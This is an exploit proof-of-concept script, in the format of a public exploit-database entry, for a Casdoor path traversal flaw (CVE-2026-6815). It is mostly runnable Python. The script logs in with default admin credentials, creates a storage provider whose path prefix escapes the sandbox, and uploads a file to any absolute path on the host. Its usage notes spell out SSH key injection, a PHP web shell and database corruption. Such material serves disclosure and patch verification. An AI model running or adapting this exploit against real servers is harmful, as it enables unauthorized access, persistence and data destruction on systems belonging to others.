# Exploit Title: Casdoor 3.54.1 - Arbitrary File Write via Path Traversal # Date: 2026-05-11 # Exploit Author: sixpain # Vendor Homepage: https://casdoor.org/ # Software Link: https://github.com/casdoor/casdoor # Version: < 3.54.1 # Tested on: Linux / Docker # CVE : CVE-2026-6815 """ Casdoor Arbitrary File Write / Path Traversal PoC (CVE-2026-6815) ================================================ DESCRIPTION: This script exploits a Path Traversal vulnerability in the storage provider management component of Casdoor. By creating a 'Local File System' provider with a manipulated 'pathPrefix', an authenticated administrator can bypass the storage sandbox to write, overwrite, or delete arbitrary files on the underlying host filesystem. IMPACT: - Remote Code Execution (RCE) via SSH key injection or web shell upload. - Persistent Denial of Service (DoS) by corrupting core application binaries or database files (e.g., casdoor.db). USAGE EXAMPLES: 1. SSH Key Injection for RCE: python3 poc.py --url http://target:8000 --usr admin --psw 123 --file id_rsa.pub --rpath /home/casdoor/.ssh/authorized_keys 2. Persistent DoS (Database Corruption): python3 poc.py --url http://target:8000 --usr admin --psw 123 --file dummy.txt --rpath /app/casdoor.db 3. Reverse Shell (via secondary web server webroot): python3 poc.py --url http://target:8000 --usr admin --psw 123 --file shell.php --rpath /var/www/html/shell.php TROUBLESHOOTING & TECHNICAL NOTES: - APP & ORG CONTEXT: By default, the script targets the 'app-built-in' application and 'built-in' organization. If you have credentials for custom namespaces, specify them using the --appname and --orgname flags. - FILE OVERWRITE BEHAVIOR: Successful overwriting occurs only once per unique remote path. Casdoor's resource management logic prevents direct subsequent overwrites by appending increments (e.g., file-1.ext, file-2.ext) to the resource name if the entry already exists in the application's internal database. To re-exploit the same path, the specific resource entry must usually be deleted via the UI/API or a different provider name must be used. - PERMISSIONS: Exploitation success is dependent on the OS-level permissions of the user account running the Casdoor service. - VERBOSE MODE: Use -v or --verbose to inspect raw API requests and responses. DISCLAIMER: This tool is for educational and coordinated disclosure purposes only. Unauthorized testing against systems you do not own is illegal. """ import argparse import requests import json import os def log_request(response, verbose): """Prints request and response details if verbose mode is enabled.""" if verbose: print("\n" + "="*50) print(f"DEBUG - REQUEST: {response.request.method} {response.request.url}") print(f"HEADERS: {json.dumps(dict(response.request.headers), indent=2)}") if response.request.body: # Handle potential bytes body for multipart body = response.request.body if isinstance(body, bytes): print(f"BODY: ") else: print(f"BODY: {body}") print("-" * 50) print(f"DEBUG - RESPONSE: {response.status_code}") print(f"HEADERS: {json.dumps(dict(response.headers), indent=2)}") try: print(f"JSON BODY: {json.dumps(response.json(), indent=2)}") except: print(f"RAW BODY: {response.text[:500]}...") print("="*50 + "\n") def run_poc(): parser = argparse.ArgumentParser(description="Casdoor Path Traversal Exploitation PoC") parser.add_argument("--url", required=True, help="Target base URL (e.g., http://casdoor:8000)") parser.add_argument("--usr", default="admin", help="Login username") parser.add_argument("--psw", default="123", help="Login password") parser.add_argument("--file", required=True, help="Local file to upload") parser.add_argument("--rpath", required=True, help="Absolute remote path (e.g., /tmp/pwned.txt)") parser.add_argument("--appname", default='app-built-in', help="Target Casdoor Application Name") parser.add_argument("--orgname", default='built-in', help="Target Casdoor Organization Name") parser.add_argument("-v", "--verbose", action="store_true", help="Enable verbose logging") args = parser.parse_args() # Sanitize and validate URL schema target_url = args.url.strip().rstrip('/') if not target_url.startswith(('http://', 'https://')): print("[!] No protocol specified. Defaulting to http://") target_url = f"http://{target_url}" session = requests.Session() # Setting common user agent session.headers.update({ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" }) # --- STEP 1: INITIAL SESSION --- print(f"[*] Step 1: Retrieving initial session cookie...") try: r1 = session.get(f"{target_url}/login/built-in") log_request(r1, args.verbose) if "casdoor_session_id" not in session.cookies: print("[-] Error: Failed to retrieve casdoor_session_id.") return print(f"[+] Session ID obtained: {session.cookies.get('casdoor_session_id')}") # --- STEP 2: LOGIN / PRIVILEGE ESCALATION --- print(f"[*] Step 2: Logging in as {args.usr}...") login_payload = { "application": args.appname, "organization": args.orgname, "username": args.usr, "password": args.psw, "autoSignin": True, "signinMethod": "Password", "type": "login" } r2 = session.post( f"{target_url}/api/login", data=json.dumps(login_payload), headers={"Content-Type": "text/plain;charset=UTF-8"} ) log_request(r2, args.verbose) login_res = r2.json() if login_res.get("status") == "ok" and 'admin' in login_res.get("data").lower(): print("[+] Login successful. Admin privileges confirmed.") else: print("[!] Warning: Not an admin or login failed. Attempting to proceed anyway...") # --- STEP 2.5: VERSION CHECK --- print(f"[*] Step 2.5: Checking Casdoor version...") try: r_version = session.get(f"{target_url}/api/get-version-info") log_request(r_version, args.verbose) if r_version.status_code == 200: version_data = r_version.json().get("data", {}) if not version_data: # Some versions might return data directly or in different format version_data = r_version.json() version = version_data.get("version", "unknown") print(f"[+] Target Casdoor version: {version}") # Check if version is patched (>= 3.54.1) is_vulnerable = True if version != "unknown" and version != "dev": try: v_clean = version.lstrip('v').split('-')[0] v_parts = [int(p) for p in v_clean.split('.')] if v_parts >= [3, 54, 1]: is_vulnerable = False except: pass # Parsing error, assume vulnerable or let user decide if not is_vulnerable: print(f"[!] WARNING: Target version {version} is likely PATCHED (>= 3.54.1) and this PoC will not work.") choice = input("[?] Do you want to continue anyway? (y/N): ").lower() if choice != 'y': print("[-] Aborting.") return else: print("[!] Warning: Could not retrieve version info (Status: {}).".format(r_version.status_code)) except Exception as e: print(f"[!] Error during version check: {e}") # --- STEP 3: CREATE MALICIOUS STORAGE PROVIDER --- print("[*] Step 3: Creating Path Traversal Provider...") provider_payload = { "owner": "admin", "name": "path_traversal", "createdTime": "2026-02-20T17:59:58+01:00", "displayName": "Path Traversal Provider", "category": "Storage", "type": "Local File System", "method": "Normal", "pathPrefix": "../../../../../../../../../" } r3 = session.post( f"{target_url}/api/add-provider", data=json.dumps(provider_payload), headers={"Content-Type": "text/plain;charset=UTF-8"} ) log_request(r3, args.verbose) prov_res = r3.json() msg = prov_res.get("msg", "") if prov_res.get("status") == "ok": print("[+] Malicious provider created successfully.") elif "UNIQUE constraint failed" in msg: print("[*] Provider 'path_traversal' already exists. Reusing it.") else: print(f"[-] Failed to create provider: {msg}") if "pathPrefix" in msg and "is not allowed" in msg: print(f"[!] Escape sequence is sanitized. Check Casdoor version < 3.54.1 (CVE-2026-6815 is likely fixed).") return # --- STEP 4: FILE UPLOAD (EXPLOITATION) --- print(f"[*] Step 4: Uploading {args.file} to {args.rpath}...") upload_params = { "owner": args.orgname, "user": args.usr, "application": args.appname, "tag": "custom", "parent": "ResourceListPage", "fullFilePath": args.rpath, "provider": "path_traversal" } if not os.path.exists(args.file): print(f"[-] Error: Local file {args.file} not found.") return with open(args.file, 'rb') as f: # Note: headers are handled automatically by requests for multipart/form-data files = {'file': (os.path.basename(args.file), f, 'application/octet-stream')} r4 = session.post(f"{target_url}/api/upload-resource", params=upload_params, files=files) log_request(r4, args.verbose) upload_res = r4.json() if upload_res.get("status") == "ok": print("\n" + "!"*25) print(" EXPLOIT SUCCESSFUL") print("!"*25 + "\n") print(f"Response Path") print(25*'-') print(f'\t-data : {upload_res.get('data')}') print(f'\t-data2: {upload_res.get('data2')}') print(f'\t-data3: {upload_res.get('data3')}') print(25*'-') else: print(f"[-] Upload failed: {upload_res.get('msg')}") except Exception as e: print(f"[-] An unexpected error occurred: {e}") if __name__ == "__main__": run_poc()